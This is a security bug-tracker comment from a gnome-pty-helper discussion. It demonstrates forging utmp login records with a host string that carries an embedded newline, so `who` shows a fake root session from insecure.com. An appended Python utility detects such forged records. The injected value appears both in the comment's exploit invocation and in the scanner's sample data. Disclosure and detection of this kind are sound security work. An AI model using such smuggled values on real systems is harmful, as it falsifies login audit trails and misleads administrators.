Comment 38 for bug 22052

In , Paul Szabo (psz-maths) wrote : Re: gnome-pty-helper foo

I have not yet found any uses for utmp/wtmp: maybe Joey is right and there
is no security issue. I would then suggest that to increase security,
setuid/setgid bits be removed from all utmp/wtmp maintainers.

In the meantime, I hope that conscientious sysadmins do look at who and
last output occasionally; and expect that

psz@savona:~$ exploit "$(perl -e 'print "XX)\nroot tty01 Jan 01 02:03 (insecure.com"')" & sleep 1; who; sleep 6
[1] 22149
Writing utmp (who) record ...
utmp record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 22152
Sleeping for 5 secs...
psz pts/2 Oct 12 12:16 (XX)
root tty01 Jan 01 02:03 (insecure.com)
psz pts/1 Oct 12 11:37 (y622.yt.maths.usyd.edu.au:0.0)
[1]+ Done exploit "$(perl -e 'print "XX)\nroot tty01 Jan 01 02:03 (insecure.com"')"
psz@savona:~$

should suitably freak them out.

Cheers,

Paul Szabo <email address hidden> http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
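
A defensive check for the kind of forged who line shown in the comment above, as an added example that is not part of the original comment or of any project's code: it parses utmp records and flags login entries whose text fields contain control characters such as an embedded newline. The 384-byte record layout is an assumption (glibc on Linux), the helper names are hypothetical, and the sample records are constructed, reusing the host string from the comment.

```python
import struct

# Assumption: glibc "struct utmp" on Linux, 384 bytes, little-endian.
UTMP = struct.Struct("<hxxi32s4s32s256shhiii4i20s")
USER_PROCESS = 7  # ut_type value for a normal login session


def _text(raw):
    """Decode a NUL-padded fixed-width field."""
    return raw.split(b"\0", 1)[0].decode("latin-1")


def _suspicious(value):
    """True if the field holds characters that can break a line of who output."""
    return any(ord(c) < 0x20 or ord(c) == 0x7F for c in value)


def scan_utmp(data):
    """Return (index, user, line, repr(host)) for login records with control chars."""
    findings = []
    for idx in range(len(data) // UTMP.size):
        rec = UTMP.unpack_from(data, idx * UTMP.size)
        ut_type, line, user, host = rec[0], _text(rec[2]), _text(rec[4]), _text(rec[5])
        if ut_type != USER_PROCESS:
            continue
        if any(_suspicious(f) for f in (line, user, host)):
            findings.append((idx, user, line, repr(host)))
    return findings


def make_record(user, line, host, pid=1000):
    """Build a constructed sample record (not real system data)."""
    return UTMP.pack(USER_PROCESS, pid, line.encode(), b"", user.encode(),
                     host.encode(), 0, 0, 0, 0, 0, 0, 0, 0, 0, b"")


# Constructed sample: one ordinary record, one with the host string from the comment.
SAMPLE = (make_record("psz", "pts/1", "y622.yt.maths.usyd.edu.au:0.0")
          + make_record("psz", "pts/2", "XX)\nroot tty01 Jan 01 02:03 (insecure.com"))

if __name__ == "__main__":
    for idx, user, line, host in scan_utmp(SAMPLE):
        print(f"record {idx}: user={user} line={line} host={host}")
```

To check a live system, pass the contents of the utmp file (commonly /var/run/utmp) read in binary mode to scan_utmp instead of SAMPLE.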